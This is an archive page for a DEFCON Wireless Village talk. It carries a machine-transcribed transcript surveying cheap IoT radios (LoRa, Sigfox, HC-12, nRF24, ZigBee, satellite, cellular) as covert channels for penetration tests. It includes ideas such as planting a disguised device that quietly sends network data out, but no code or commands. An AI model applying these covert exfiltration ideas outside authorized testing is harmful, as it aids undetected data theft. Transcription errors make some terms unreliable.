WIRELESS VILLAGE - Can you hear me now (DEFCON)? Wireless communication for pentesters

Video thumbnail (Frame 0) Video thumbnail (Frame 1738) Video thumbnail (Frame 3758) Video thumbnail (Frame 4589) Video thumbnail (Frame 7161) Video thumbnail (Frame 8471) Video thumbnail (Frame 9520) Video thumbnail (Frame 10314) Video thumbnail (Frame 11697) Video thumbnail (Frame 12673) Video thumbnail (Frame 13444) Video thumbnail (Frame 15292) Video thumbnail (Frame 16579) Video thumbnail (Frame 18020) Video thumbnail (Frame 20145) Video thumbnail (Frame 21930) Video thumbnail (Frame 23513) Video thumbnail (Frame 24798) Video thumbnail (Frame 27002) Video thumbnail (Frame 29262) Video thumbnail (Frame 31350) Video thumbnail (Frame 32423) Video thumbnail (Frame 35189) Video thumbnail (Frame 37237) Video thumbnail (Frame 39023) Video thumbnail (Frame 41410) Video thumbnail (Frame 42906) Video thumbnail (Frame 43648) Video thumbnail (Frame 44817) Video thumbnail (Frame 48871) Video thumbnail (Frame 49584) Video thumbnail (Frame 51208) Video thumbnail (Frame 52721) Video thumbnail (Frame 54152)
Video in TIB AV-Portal: WIRELESS VILLAGE - Can you hear me now (DEFCON)? Wireless communication for pentesters

Formal Metadata

WIRELESS VILLAGE - Can you hear me now (DEFCON)? Wireless communication for pentesters
Title of Series
CC Attribution 3.0 Unported:
You are free to use, adapt and copy, distribute and transmit the work or content in adapted or unchanged form for any legal purpose as long as the work is attributed to the author in the manner specified by the author or licensor.
Release Date

Content Metadata

Subject Area
Using cheap commodity RF hardware to act as secure or backchannel communications for security research and pen tests. Wireless communication is getting cheaper and hobby projects are integrating long range low powered communication to link devices in all sorts of unique ways. But what about in the world of information security? This talk will cover the acronym soup of current communication systems including LoRA, RFM, Satellite, ASK, and many others to identify what protocols make sense when you are trying to communicate either stealthily or in remote areas. In addition, this talk will cover how to improve reliability of wireless communication and the costs associated with making your super pen test box. Or perhaps even what evil things can be done with these and how to protect yourself. The aim for this talk is to be interactive, and allow people to share experiences.
Information Frustration CAN bus Internetworking Telecommunication Telecommunication Speech synthesis Internet der Dinge Quicksort Wireless LAN Information security Wireless LAN Form (programming)
Area Tap (transformer) 1 (number) Microcontroller Line (geometry) Mereology Web 2.0 Type theory Direct numerical simulation Software Software testing Quicksort Communications protocol
Weight Duplex (telecommunications) Multiplication sign Range (statistics) Data storage device Computer network Line (geometry) Pivot element Neuroinformatik Goodness of fit Software Hacker (term) Telecommunication Software testing
Presentation of a group View (database) 2 (number)
Duplex (telecommunications) Multiplication sign Telecommunication Communications protocol Rule of inference Window
Data management Overhead (computing) Different (Kate Ryan album) File format Charge carrier Codierung <Programmierung> Quicksort Term (mathematics) Communications protocol Data compression Power (physics) Power (physics)
Point (geometry) Trail Goodness of fit Process (computing) Connectivity (graph theory) Computer hardware Cuboid Right angle Software-defined radio Line (geometry) Power (physics)
Band matrix Multiplication sign Telecommunication Expert system Virtual machine Quicksort Wireless LAN Neuroinformatik
Axiom of choice Module (mathematics) Different (Kate Ryan album) Telecommunication Data storage device 1 (number) Bit Quicksort Power (physics) Form (programming) Neuroinformatik Power (physics)
Scripting language Type theory Group action Open source Software Telecommunication Connectivity (graph theory) Projective plane Software testing Mereology Computer worm Neuroinformatik
Module (mathematics) Enterprise architecture Overhead (computing) Information Multiplication sign Core dump Microcontroller Line (geometry) Coprocessor Power (physics) Neuroinformatik Pi Kernel (computing) Telecommunication output Software testing Software protection dongle Physical system
Module (mathematics) Frame problem Meta element Time zone File format Software developer Multiplication sign Range (statistics) Range (statistics) Frequency Different (Kate Ryan album) Telecommunication Software testing Normal (geometry) Message passing
Module (mathematics) Point (geometry) Addition Information Multiplication sign Regulator gene Core dump Microcontroller Power (physics) Power (physics) 2 (number) Revision control Dynamic Host Configuration Protocol Personal digital assistant Core dump Implementation Multi-core processor Exception handling
Satellite Implementation Multiplication sign Range (statistics) Raw image format Power (physics) Latent heat Mathematics Different (Kate Ryan album) Computer configuration Encryption Musical ensemble Energy level Social class Default (computer science) Duplex (telecommunications) Sound effect Range (statistics) Flow separation Software Personal digital assistant Telecommunication Configuration space Modul <Datentyp> Communications protocol Window Wide area network
Module (mathematics) Area Service (economics) Range (statistics) Data transmission Data transmission Bit rate Cartesian closed category Analytic continuation Communications protocol Modem Asynchronous Transfer Mode Wide area network
Module (mathematics) Information Range (statistics) Range (statistics) Bit Microcontroller Open set Distance Open set Band matrix Sparse matrix Uniformer Raum Telecommunication Computing platform Musical ensemble Configuration space Software testing Figurate number Communications protocol Computing platform
Module (mathematics) Point (geometry) Module (mathematics) Polygon mesh Hoax Connectivity (graph theory) 1 (number) Mereology Regular graph Tracing (software) Data transmission Neuroinformatik Goodness of fit Different (Kate Ryan album) Telecommunication Software testing Musical ensemble Communications protocol Information security Library (computing) Asynchronous Transfer Mode
Noise (electronics) Greatest element Implementation Game controller Thread (computing) Range (statistics) 1 (number) Voltmeter Maxima and minima Bit Virtualization Line (geometry) Power (physics) Power (physics) Connected space Revision control Frequency Telecommunication Office suite Implementation Communications protocol
Satellite Module (mathematics) Laptop Block (periodic table) 1 (number) Bit Digital object identifier Connected space Software Chain Normal (geometry) Cuboid Transmissionskoeffizient
Web page Building Implementation Range (statistics) 1 (number) Thermal expansion Device driver Parameter (computer programming) Power (physics) Web 2.0 Different (Kate Ryan album) Internet der Dinge Computer-assisted translation Metropolitan area network Modem Module (mathematics) Touchscreen Cellular automaton Device driver Software Tower Personal digital assistant Telecommunication Video game Quicksort Communications protocol
Computer icon Information Execution unit Range (statistics) Plastikkarte Planning Total S.A. Particle system Bit rate Different (Kate Ryan album) Computer-assisted translation Freeware Communications protocol Software development kit
Telecommunication Planning Range (statistics) Right angle Bit Software testing Moving average Wireless LAN Communications protocol Software development kit
Component-based software engineering Implementation Embedded system Logical constant Communications protocol Physical system Cloning
Logical constant
um all right welcome to Wireless village I'm going to be giving you guys a brief rundown in a second on the various IOT communication forms that exist now and what you can do with them so come join me on a journey about me my name is
wasabi spicy wasabi the reason I'm speaking here today is because there is another wasabi in the room and it's frustrated wasabi so if you're around now make sure to see me at the end if not that's the reason why I'm speaking here today but also to give you guys some interesting information about embedded devices and wireless communications and if you're not interested in wireless communications here please you've come to the wrong place but anyway I've focused on embedded things Internet of Things and all sorts of things for the last four years I have participated in a bunch of competitions related to embedded devices and security and all sorts of things like that and that's led me down a path of looking at what can you do with embedded devices that exist nowadays and how can you get them to do what you want so what we'll be looking at today is the existing
technologies that are out there the possible uses and challenges of those technologies and what types of protocols are in use today we'll also be looking at some of the radios and microcontrollers you can pick from to do what you want to do but it's up to you on what you pick on for all this obviously so let's get started way back
when if you wanted to send data out of a network you're you're doing a penetration test or you're doing something along those lines you will have the need to get out of the network and in the old days that was and is still heavily used you're doing some sort of exfiltration using the network you're on the network as it is and that's great it works pretty well because most you know corporations most businesses and in places don't really secure their network very well some newer ones are also using 4G to allow you to communicate out that's pretty good it's you know a relatively large area of support you can use from the problem is that it's not very stealthy if someone's actively looking for you they will find you even if they're you know monitoring DNS if they're monitoring web traffic you will not be undetected some of them do support passive tap capabilities but for the most part they don't so not very useful true and proven
is Wi-Fi if you want to send data out of a network you use Wi-Fi if you want to use a network use Wi-Fi it has pretty good pivot capabilities because you can just use any device you buy at the store on eBay and just let it connect in pretty great it is sometimes capable of tapping a network because you're using basically a Linux computer to run your routing so you have the capabilities down there but again it's not very long range and it's not necessarily very stealthy if you're running you know hacker net and you're running a test that that doesn't really make it stealthy but that comes in to where
we're using wireless communications so if you're familiar with wireless you have half-duplex and full-duplex and that's pretty good so for half duplex you send data and then you receive the data for full duplex you're sending and receiving more or less at the same time which is great for us because if you want two lines of communication you now have them both working actively and hold on one second I
where is the presenter view okay hold on one second lis monitors are misconfigured and alright did the monitors just go away great alright cool technical difficulties are wonderful the monitors have gone out
okay yeah the Oh wrong view entirely
yeah when does is my problem there we go
sorry about the delay alright so okay we're talking about duplex and half duplex so what happens if we need just slow communication we don't care about receiving and sending at the same time we have the ability to just send data or receive it a lot of IOT protocols use the method of half duplex because it's very efficient well they don't even use just half duplex they just have received Windows where the device is allowed to receive data all other times it's send only so that there's a lot of opportunities here for sending data but the problem is well even Wi-Fi is half duplex and so you may not necessarily notice a problem but the general rule is regardless of the
protocol the more power you use the more data you can send the more data you send the more power you need if you're running on a battery the problem is you're going to run out of power a lot quicker if you're sending a lot of data versus something that's you know smaller more embedded when you're using Wi-Fi it's more it uses more power than something that's designed specifically for low power use such as IOT protocols so if and you have to think about compression it may not think B it might you may not imagine it's a lot but when you go from 128 bytes down to 64 bytes that's a huge difference in the amount of data that you're sending and the induration that you can operate for these devices so very very quick
high-level overview of what Wireless will look like this is very simplified there's a lot of different ways you can format data over a wireless signal but the general idea is that you have high and low sending data and receiving data and you can have different ways to send it you have a carrier and then you can do different encodings such as ASX FSK PSK OD FM all sorts of different formats so that's good but how would you implement some of these protocols well you have the the SDR s now these are
great for general use STRs are very very powerful but they're big they're getting smaller but for the most part if you're going to be using this this is something very obvious if you're gonna have a box that is an SDR and it has the enough processing power to use an SDR you're not looking at being very stealthy again it is getting better
though this is the line SDR mini this is a pretty good device I've actually been seeing some people use it over there the problem is with this device is that it does not support a lot of things that are just point and click so if you're trying to do something quick not necessarily true and what I mean by point and click here is that you can program the FPGA and other components on there but now you're developing for the hardware and it requires a little more knowledge versus just running the the devices and versus the full-blown STRs which are usually about 400 this one runs about 150 so it's very cheap and it's much smaller so we're going on the right track but of course there are
other methods of communication this one was probably one of my favorite that I've seen this is that we're going into ham radio here and ham radio has been doing this sort of work for a very long time in fact I'd say they're probably the experts in implementing if your ham radio operator you're basically the expert in implementing communication over very small amounts of wireless bandwidth and this computer over here is basically a TNC machine which is sending serial data over the radio and it allows so this technology is not new but it is extremely useful and relevant and why you may be wondering well what happens
if you're trying to get into like that power plant in the middle of nowhere well you can't use Wi-Fi then because you're not going to be just sitting in your car next to the wire there the power plant can be like hey cool i'm just here you know it's a nice place to sit down you're gonna be far away where you're not getting detected so that's good but what happens if you're in a regular business you know can you hear
me here so this is a look this is an easier form but why not make something that can be used for both so now we've
got to get creative and there's a lot of choices with these devices because if
IOT is so popular you can go from any any preferred embedded device that you can work with you can work with ZigBee in the top that's ZigBee you can work with the silicon technologies modules that do for gee they do all sorts of different communication ones there's also the ESP modules ESP modules are by far the cheapest modules that you can get if you need to throw them on anything there's the ESP eight six nine one or I'm blinging on the name but it is eight two eight five eight to 85 that came for me it is designed specifically for being very lightweight it has imbedded storage on it so you can actually program it have it running stuff and do a little bit of data storage while you buffer to send out if you need to so that one's very good but the things you have to think about are what IO do you need if you're connecting to an actual computer or do you have what you need to connect to that computer do you need to be stealthy do you need to be battery-powered if it's battery-powered you need to be able to relay the data if you have a lot of data being sent and you're using all your battery you're gonna lose power very quickly so here's
one that I saw online this is the Wi-Fi ducky it's an open source project it looks very open-source but it's very powerful and this is the type of stuff that is very exciting to me because this is someone taking multiple components putting them together and building something that is actually very useful for work but the only problem with this device and obviously it's easy to fix if you build an enclosure is it looks somewhat sketchy if you were to plug this into someone's computer to drop a payload they're probably going to notice and that that's problematic and the other problem with this is it doesn't have full communications you can't receive data out you can you can launch scripts you can make it pivot over the network but once you've executed the commands and you've triggered it from wireless it's not sending data back to you and again the problem is you don't
want you don't want the part of this dance group coming out to see you when you're doing a pen test so we need something a little more subtle that's
where you get into the micro controllers the micro controllers nowadays are very very good you obviously again ESP modules they're super cheap that's why you're going to see them again and again for every device and really that you're gonna see the other thing you may see is narrow I think that's I pronounce it these devices are absolutely stunning they're very very low-power they have a hope RF module built-in they have an Arduino built-in you just basically start flashing them and you have a device that can run over battery relay information and do anything you need it to off of a very small package in my test this thing actually would lasted for over I think two weeks in doing timed communication with just running off of a small little battery that's pretty good but there's
others if you need something a little more powerful and you you want instead of using a full computer you want to just embed and you want to have one device that you can just drop in that's where the system on a chips come in Linux has been getting on smaller and smaller devices for a long time now and the hobbyist community has been growing so the top device is the VOC or how many people have heard of a VOC or before okay more than I actually expected for those of you are now we're over the book or is it's a very cheap embed system on a chip device that's running open word and they've exposed all the i/o lines they've exposed all the i/o lines out so basically what you can do is you can add radios you can add other communication met mediums it also has Wi-Fi built in so that's good and it's pretty powerful it again it runs Linux so you can embed things on and make it do things and it's about ten dollars the other one is the orange pie orange pies are very interesting the the interesting thing is on about our enterprises they they basically run a stock kernel now and they're a fairly powerful processor they're running about one gigahertz so it's basically running a Raspberry Pi in a little tiny dongle that has either net Wi-Fi and i/o that you can access so if you're needing something that you need to just embed into something small these things are the size are smaller than the Raspberry Pi so you know we can do a lot
of stuff communication is important and we're gonna get into how and what technologies work for different situations I went through and started going on eBay a while ago and went through and bought every single wireless module I could find some of them work better than others as you will see and it turns into a very interesting experience when you're trying to deal with some of these devices there's some quirks that exist if anybody's done any hobbyist or IOT development you'll start seeing things where the radios don't work as expected in every situation so how are these radios tested this was done last year I started getting all these modules what I did was I started going farther and farther with about a thousand packets as a test they were sent over a short period of time the packets were a normal format that was used across every single radio so if one works better than the other it's not a difference in the packet that was being sent there's no time different there's no different data for each packet it's all the same the same and I was testing range and the signal quality being sent and received by each of the devices so
we're back to ESP modules again they are very powerful they use about 70 ml amps of power if you're plugged into a real device that doesn't matter but if you're running off of mobile you're trying to relay information this gets a little problematic they use about some they use about 60 ml amp spiked in addition so it goes up to about 80 ml amps 85 minutes when you're powering up so if you're running on an extremely low power battery you could reset the device and then you will lose the capability f it also uses that amount of power for three to five seconds as it's doing DHCP so every time you need to connect and as it Reed refreshes the least it will be using it more power it has a fairly high transmit draw instead of receive so it's good they're reliable in the sense that they are everywhere they're cheap and if you buy one and you buy another one from another vendor they're still going to work the same they speak Wi-Fi and that's that's something that's good about them is that they are so standardized the ESP 32 is another
interesting technology from espresso it's a dual-core version it's pretty common now the problem that I've found with the ESP 32 is that it has a low-power core it's one of its selling points and so far I have not seen anyone successfully implement the low-power core except for one person who was writing raw assembly in a C struct 2 and then writing that directly to the microcontroller it's very complicated in that case and that's not ideal for something that we're trying to just apply quickly and again they have their very low power the ESP 32s are actually slower by a couple of seconds to connect via DHCP every time you can set them statically but it's not necessarily ideal and then again they also have the high transmit draw when they're working
but then we get to Laura if you've done anything in the embedded protocol range Laura is a very powerful protocol it's it's sub gigahertz in most cases there's a couple of different ranges that it works but it by default has a one to two mile range it's it's licensed it's designed off of some technology called chirp spread spectrum that's how it does what it does with the range it's used in not only raw radios but it's also used for in some cases people have been experimenting with satellite communication using Laura which opens up a lot of possibilities if you design a device that's going to use Laura for communication and you add in satellite implementations you don't have to rewrite everything that you're implementing in the first place so there it is just the the lower level it's the the implement the actual protocols implementations there's a couple of them Laura when and haystack these are both implemented by licensing and they have a couple of different specific changes that they um they do versus for how you transmit to them or receive from them again Laura is the Phi implementation and it uses about 30 ml amps to receive and about 100 milliamps to transmit so we're looking at something that's very very low if you're running on battery this thing can go for a very long time so Laura
when it's self configuration and joy and you just build a device you build it it's gonna join to the Lauren Network now where is the Lauren network well interestingly it's all around us if your city supports it they're having some they're slowly rolling out to different cities it's much like a cellular network in the sense that you have to have coverage where you're going to be deploying in the middle of nowhere you're not going to have coverage Laura will still work but Laura when will not it's encrypted with a 128-bit but there it's not necessarily the most effective encryption if you've looked online there's this problems with their encryption implementation it supports OTA configuration uploading and downloading there's several different implementation classes if you want to use Laura when if you're trying to send only that's class a it has two timed windows every so often I forget if it's a day or a week but there's two windows where it will pull updates to reconfigure itself otherwise it's just gonna sit there and send all the data you have no idea if you're gonna ever get it back Class B has hired downlink speeds but otherwise is unchanged Class C is always listening except when it's transmitting so that's where you go into the half duplex Class C seems like the best option to do but there's also problems with having availability in the windows that you're transmitting for the the lorwyn implementation oh okay just
change any room there is a small licensing cost for anything that used with Laura it's not miss not very big but it is something that exists so Wi-Fi is free Laura is not completely free so
you also have cig Fox it's both a protocol and a company cig Faust cig Fox is very interesting because there's a module cost there's a licensing fee to have the module modem there's also a service fee for the modem so you're constantly paying money to use this and it is primarily transmission only and only in areas that sig foxes covered so if you're trying to use this in areas that you are long range even though it has a longer range than Lara you may not be able to get reception and it has the transmission usage of Laura it only uses about 40 milliamps during transmit and it can send a whopping 14 bytes at 600 bits per second so you know you're talking a lot of data here unfortunately for us that probably isn't good enough but if you need something that's just ping back and say hey I'm still here that that does work it has a continuous TX mode which is good if you're just trying to you know do location and but again it's the licensing fees really
kill it - 7 is the is supposed to be the solution to both Laura and sig Fox it's an open alliance open platform also uses sub gigahertz communication it only uses about 10 ml m to receive and the you can run your own nodes to receive data from so you can implement something that goes over any radio protocol from this if you need to use it that's really good the only problem is the documentation is a bit sparse on it if you're trying to you implement something using it you have to go to someone who already implements it's a vendor and that's a little expensive because we're usually if we're doing some kind of pen test it's one offs not thousands so what else can we
look at well here is probably one of my favorite modules if you're doing some kind of communication pen test or or your need to communicate during a pen test where you can't use Wi-Fi or any other communications the HC 12 is this amazing little module that you can buy off eBay it's cheap it works very well if you get they come in pairs and as long as you're using the pair's they can work up to about 3,000 feet distance in range they're very very powerful they have a built in microcontroller on them that you can configure they communicate over raw cereal so basically you can plug them into anything and they will just work they will send and receive data and you'll be sending and receiving serial data which is great because now you're not using super slow bandwidth when you cereal so if you need data information out or something else that you're getting it's slow but it's manageable the cool thing about these radios is that they're very small the bad thing about these radios is that that no two pair are alike if you're going to buy a lot of them be prepared to buy double when I was doing the tests on these I would buy one I would receive it and I could not get them to communicate I couldn't figure out why they were not communicating and I would go through I'd try to see why it wasn't working they both turn on they both said they were configuring and sending data or receiving data nothing would come out and it occurred to me finally let me turn on my hack RF and just take a look what it turned out to be was the crystals on the these chips are not quite up to par none to our likes so what happens is you get offsets that are just enough that you will not be able to communicate over these devices so they work great in pairs because the two the same crystals are used but you have to keep at your eye on what crystals use they they have markings on them so these are very good but be prepared to buy a lot of them and on a similar note the
NRF 24 modules are very good but they also have the same crystal problem no two crystals are alike luckily these are a little easier to remove the crystal from but they also if you buy them in pairs which they normally come with they'll work great but if you try to get them working in a mesh mode which is something they actually support you will have a problem because none of them are genuine usually they fake the markings fairly well but if you look at them through either a microscope or something like that you'll see trace differences so you never necessarily getting a genuine one so they're using parts sometimes different the really cheap ones are very obvious when you get a fake one because they're they'll miss be missing resistors or other components that are actually fairly important on it on a radio but they don't have them so but if you get one of the fairly good ones they may still be fake but the crystals may not be up to par again so these are very good but be prepared to buy a couple of them until you get pairs that work the one nice thing about the NRF modules is they also support both linux and arduino natively well I guess Linux and Arduino support them made li but not the other way around but they're very good and if you can get enough pairs that work they support a very good mesh protocol and they work for about 500 to 600 feet in my tests but again the crystals were what really killed it
but if you're looking for something that just works and you don't have to pay licensing fees necessarily the hope RF modules they support Laura which again you're gonna have that license agreement but they also support just regular RF transmission over a couple of different bands I'm blanking on which ones they are right now but they're very well documented they support both linux and are doing two again both support them it's 10 a module but these things are appearing everywhere in the security community if you have any of the the DC darknet badges they use these they've used them for the last couple of years so they're definitely showing up in the community they're very good modules they're very good quality and that's the difference between some of the other communication modules is that these are actually very well built and you can use them pretty much anywhere and guaranteed that they're if you're gonna get a mesh they're gonna work if you're gonna communicate point to point they're going to work they're spy based which isn't a big deal if you're gonna use them on a regular computer that makes it a little more complicated but you can also get cheap modules to communicate over spied to a regular computer or using a Raspberry Pi or anything else but that's about it and they use about 50 ml amps so they're fairly low powered and then
let's go to simple if you want something that's literally just a throwable device you just want a radio you don't want something that does any of the you know protocol or anything else you just want something that transmits and ASX radios are very good at that they just transmit they are the more power you provide them they can go up to about 12 volts the more range you're going to get on them they are supported by virtual wire and Radiohead in Arduino you can also just write to them using Linux if you have any spare IO lines they have a max range of about 200 250 feet they're not spectacular but they're cheap you can buy a Pat n pack of them for less than 5 and they do work unlike the other ones they don't really have a crystal problem but they're just very cheap and not very good I have three different versions of just cheap ASX radios the ones on the bottoms are the ones you're gonna see most common the one on the top left is the LR 43b if you're curious about it it is designed a little smaller it's very small package but it's it has a little bit better range it's bit a little bit better quality it doesn't have so much noise interference and then the other side is the H 3/4 C and that one also has good a better noise quality than the bottom one but they're not very good they they work at about 433 megahertz which is about the same frequency that you get when you get those cheap thermometers so they're not very fancy but they're not going to be detected because people in their offices or anywhere have those devices already so you can just transmit freely on those and then the ZigBee ZigBee is pretty
much showing up everywhere in IOT devices it's there's a couple of implementations based off the sig B's one of the implementations of 802 15-4 there's also 6lowpan they're all very low power and very low range usually you have a hub and other communication methods and the reason I'm putting on this on here even though it's such lower low range is the fact that you can use these to relay so if you've got control of an IOT device and it had ZigBee you can transmit out to another device and another device and if you have control along that path where they're all meshed together you can send it out even if you don't necessarily have control of the direct connection to the device that you're starting with so that makes it very good for that but again they're very low range there's um there's thread protocol which is made by Google it is encrypted I don't know of much that you can use with it that's open but it is something that also exists on the same frequency range and you may be thinking
why not just use satellites satellites really good you know you always have connection to a satellite it's out there up there the problem is that they're expensive very very very expensive for 28 dollars you can get 10 kilobytes of data so it's very good on the budget unfortunately for us that's not very good but the upside is that they are universally accessible the the other interesting about the satellite transmitters is they're fairly large this is the
smallest module I could find in the corner is the is a normal size module it's about it's basically the size of a small laptop that you transmit and those are small the smallest ones I found there they use a specific one satellites chain they're called rock box rock blocks they use the iridium Network and that's where you get that high cost there's other ones that you can use that are actually continuous uplink and downlink versus just sending data for a small fee those work but they are not very affordable it is 90 for 30 megabytes of data so you can use it but if you're using them you're probably you probably have quite a bit of money so what's the next best thing to cellular well I don't know what
that guy is wearing but it's cellular so
cellular is fairly good with this stuff the only problem is again you run into the problem where you're not in range of a cell tower or you're in a building where you don't have range if you're at DEFCON you know you've probably been noticing where the signals going out it's in many cases not someone actually trying to hack you what's happening is there's just so much communication going on here you're we're not getting any signal out and that's problematic and that's one of the problems that you can run into with these devices but there's a couple of protocols that exist you can communicate on different I'm gonna say protocols now but so you have 3G 4G 2g those are all the standard ones that most people have heard of but what's coming out now is cat zero cat one cat m1 and enbe IOT these are all over cellular networks they're getting deployed worldwide and they're really really useful for example cat zero and cat one they have limited messaging support but they have a dedicated basically serial downlink and uplink so you can send data continuously using a cellular network in the screen shot of the picture person holding it that's an cat one radio so they're very small and then NBI that's the bottom corner those are about 50 kilobits a second so very small but they're also it has higher latency but it's a lot bigger coverage I don't know why I mean I ot is gaining so much popularity but it is so if you can use it it's fairly deployed all over the world now and then if we go back to what most people use that's 4G and eventually 5g it's very flexible but you're gonna have to have a baseband you're gonna have to have all sorts of things if you get lucky you can actually use that commands on the modem but that's going to be very complicated and not necessarily very useful because you're gonna have to write a lot of driver support then you have to G and 3G they're really good because the protocol implementations of 2g and 3G actually support web requests directly over the modem you don't have to implement anything else you just use an ACK man to say hey get this page if that page has request parameters in it and you're now sending data out so it's a very good way of using it their end of life they should be all you know removed by around 2022 if I hear correctly but it just depends so don't rely on it but those are very useful now you can get the modules for very cheap they're about 30 bucks and you can just deploy them and go they they're fairly low power what
else is there ok so here's a breakdown I'm looking for the monitor over there here's a breakdown of the different protocols that are supported on cellular and the different data rates as you can see khatm supports more data no bits per second versus kilobits but then you don't necessarily need that and then this comes back to the half-duplex and full-duplex you can you can see where they come in where you can send more data or less but who provides it well
I'm only listening to these are the only two companies that got back to me Verizon t-mobile and all the others also say they support these you know NB IOT cat one and they will sell you a dev kits but it turns out they'll only sell them to you if you make thousands of units in your a corporation that can you can afford to do that so it's it's a little problematic these two on the other hand they replied to me very quickly they were able to give me information on how to use the protocols how to use the radios that we're going over cellular so that was very nice for for particle it's a little expensive they give you a free card but it's three megabytes included only 21 megabytes is a total of 40 cents so if you wanted to use 200 megabytes a month it's about 100 or you can just buy the one gig plan which is about 400 again it get the prices are steep for in the IOT communication protocols that are long range but they do work alright so
here's the dev kit the DEF kits are fairly cheap you can get them for about a hundred bucks actually if from 18t but they again unless you're planning on using you know only a little bit of data you have to be considerate of how much the the actual plan costs versus implementing them but what is the goal why why you know do this talk right here
well the goal is to implement something that does not get detected how good would it be if you go into your pen test and roll in a coffee maker that has Wireless you know 4G 3G or you know it's using Laura any of these communication protocols I've listed today and you just roll it in someone's like oh look a new coffee maker they won't suspect anything and then you have you know either Wireless or some other thing that it's plugged in it's monitoring and sending the data out via the IOT communications nobody's going to suspect a thing it's gonna sit there for a while probably you will never get it back but at least you have something now that's easily rolled in and so the goal here again is that we
want something that works that small not easily detected send you know the data out very easily we don't want to do a lot of implementation but we wanted to go remote and maybe send it multiple paths if we can do mesh it's also good and that's about it I hope this was a
good summary of the IOT shouldn't prayer communication protocols that exist today there's quite a few of them I know this has been mostly high-level for what was actually supported there's more stuff online that I've worked on that you can see but this hopefully will just give you an idea of what technologies you can use now and where you can use them it's up to you in the end but again hopefully this covers most of them that exist and if you have any questions feel free to find me at the end but thank you guys for being here today [Applause]